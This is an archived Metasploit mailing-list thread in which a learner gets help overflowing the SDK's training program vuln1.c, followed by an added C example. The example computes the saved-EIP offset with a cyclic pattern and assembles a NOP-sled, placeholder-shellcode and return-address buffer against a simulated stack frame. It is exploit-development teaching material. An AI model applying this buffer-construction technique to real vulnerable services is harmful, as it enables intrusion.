Metasploit mailing list archives

Framework SDK 2.5 doubts


From: sahirh at mielesecurity.com (Sahir Hidayatullah)
Date: Fri, 7 Apr 2006 11:22:57 -0700

First check whether you're overwriting the saved EIP with the right number
of bytes. You can figure out the exact length of your buffer using
PatternCreate() in conjunction with patternoffset.pl from the SDK directory.
If you're sure you're overwriting EIP completely, look at the address that
you're returning to and ensure that your NOPs lie there. From what I
understood, you picked an address among a series of 'A's; if you return into
a string of 'A's, they will not be valid instructions and your exploit will
bork.


--S.

  _____  

From: curious one [mailto:0x0804 at gmail.com] 
Sent: Thursday, April 06, 2006 5:37 PM
To: framework at metasploit.com
Subject: [framework] Framework SDK 2.5 doubts


Hi,

I am a n00b here. I was trying to learn remote exploitation using
Metasploit's documentation. I used the SDK and the program vuln1.c as the
target. I followed the first part, where we find the offsets and locate the
return address accordingly. My problem is that when I am trying it with the
vuln1_2.pm exploit module my return address is never right.

Every time I try a return address I get this:

Program received signal SIGSEGV, Segmentation fault.
0xbfb247cf in ?? ()

I do an x/200x $esp-256 in gdb and I can see an 'A' sled. I choose an address
in that address and run the exploit again, and still I end up with just a DoS
and my payload is not getting through at all. Any help on that?

I am using Slax (BackTrack if you please), gcc 3.3.5, kernel 2.6.12.2.

All help will be appreciated.

Cheers
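The two checks in Sahir's reply above, worked through in C as an added example (this is not code from either poster, from vuln1.c, or from the Metasploit SDK). It generates a cyclic pattern with the same Aa0Aa1... scheme as PatternCreate, feeds it to a constructed 64-byte stack frame that stands in for the vulnerable program, reads back the value that would land in EIP, recovers the offset the way patternOffset does, then builds a NOP-sled buffer and checks what byte the chosen return address actually lands on. The buffer address 0xbfb24700, the return address 0xbfb24720 and the single int3 byte used as placeholder shellcode are all assumptions, stand-ins for what gdb would show on the poster's machine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Cyclic pattern in the PatternCreate scheme (Aa0Aa1...Aa9Ab0...):
   any 4 consecutive bytes identify their own position in the buffer. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                out[n++] = u;
                if (n < len) out[n++] = l;
                if (n < len) out[n++] = d;
            }
    return n;
}

/* The patternOffset step: eip is the value gdb printed at the crash.
   x86 is little-endian, so EIP 0x33634132 means the bytes "2Ac3" in memory.
   Returns the offset of those bytes in the pattern, or -1 if absent. */
long pattern_offset(const char *pat, size_t len, uint32_t eip)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(eip >> (8 * i));
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Constructed stand-in for the vulnerable frame (not vuln1.c itself):
   a 64-byte buffer, then the saved EBP, then the saved return address. */
struct frame {
    char     buf[64];
    uint32_t saved_ebp;
    uint32_t saved_eip;
};

/* Simulate the unchecked copy into a local frame and return the value that
   would be popped into EIP (decoded little-endian from the raw bytes). */
uint32_t simulate_crash(const char *input, size_t len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    memcpy(&f, input, len < sizeof f ? len : sizeof f);
    const unsigned char *p = (const unsigned char *)&f + offsetof(struct frame, saved_eip);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Build [NOP sled][shellcode][return address]: the sled plus shellcode fill
   exactly `offset` bytes so the address overwrites the saved EIP.
   Caller guarantees sc_len <= offset and room for offset + 4 bytes. */
size_t build_exploit(char *out, size_t offset, const char *sc, size_t sc_len, uint32_t ret)
{
    size_t sled = offset - sc_len;
    memset(out, 0x90, sled);                    /* NOPs slide into the shellcode */
    memcpy(out + sled, sc, sc_len);
    for (int i = 0; i < 4; i++)                 /* address written little-endian */
        out[offset + i] = (char)((ret >> (8 * i)) & 0xffu);
    return offset + 4;
}

/* Sahir's second check: what would execute at ret? buf_addr is where the
   buffer sits on the target stack (read off gdb's x/200x $esp-256 dump).
   Returns the byte at ret, or -1 if ret does not point into the buffer. */
int byte_at_return(const char *buf, size_t len, uint32_t buf_addr, uint32_t ret)
{
    if (ret < buf_addr || ret - buf_addr >= len)
        return -1;
    return (unsigned char)buf[ret - buf_addr];
}

int main(void)
{
    char pat[200], raw[128];
    size_t n = pattern_create(pat, sizeof pat);
    uint32_t eip = simulate_crash(pat, n);
    long off = pattern_offset(pat, n, eip);
    printf("crash EIP = 0x%08x -> saved EIP at offset %ld\n", eip, off);

    /* Assumed addresses, stand-ins for what gdb showed on the poster's box. */
    const uint32_t buf_addr = 0xbfb24700, ret = 0xbfb24720;
    const char sc[] = "\xcc";                   /* int3 placeholder for a payload */
    size_t len = build_exploit(raw, (size_t)off, sc, sizeof sc - 1, ret);
    int b = byte_at_return(raw, len, buf_addr, ret);
    printf("0x%08x lands on 0x%02x (%s)\n", ret, b,
           b == 0x90 ? "in the NOP sled" : "NOT a NOP: exploit will bork");
    return 0;
}
```

Run it against a buffer of 'A's instead of the sled and byte_at_return comes back 0x41, which is exactly the failure the reply describes: 0x41 0x41 decodes as inc ecx, not a slide into the payload, and an address like 0xbfb247cf that decodes to no pattern bytes at all is a sign the overwrite did not land on the saved EIP in the first place.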

